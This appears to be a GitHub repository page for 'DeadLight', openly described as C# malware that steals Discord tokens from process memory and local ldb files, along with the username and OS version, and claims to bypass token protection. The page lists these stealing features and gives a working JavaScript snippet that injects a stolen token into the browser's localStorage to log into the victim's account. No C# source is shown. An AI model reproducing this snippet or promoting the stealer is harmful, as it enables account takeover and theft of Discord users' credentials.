ZeroMemoryEx / DeadLight

C# Malware that Steal Discord Token Directly From Memory and bypass any kind of token protection

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Discord-Token-Grabber

Token-Stealer

Features

  • Steal
    • Token directly From memory
    • Token from ldb files
    • username
    • os version
    • bypass any kind of token protection

How to login using token

function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
  • use login("token"); then refresh the webpage ,and you will login automatically to the account using only token

About

C# Malware that Steal Discord Token Directly From Memory and bypass any kind of token protection


Languages

Language:C# 100.0%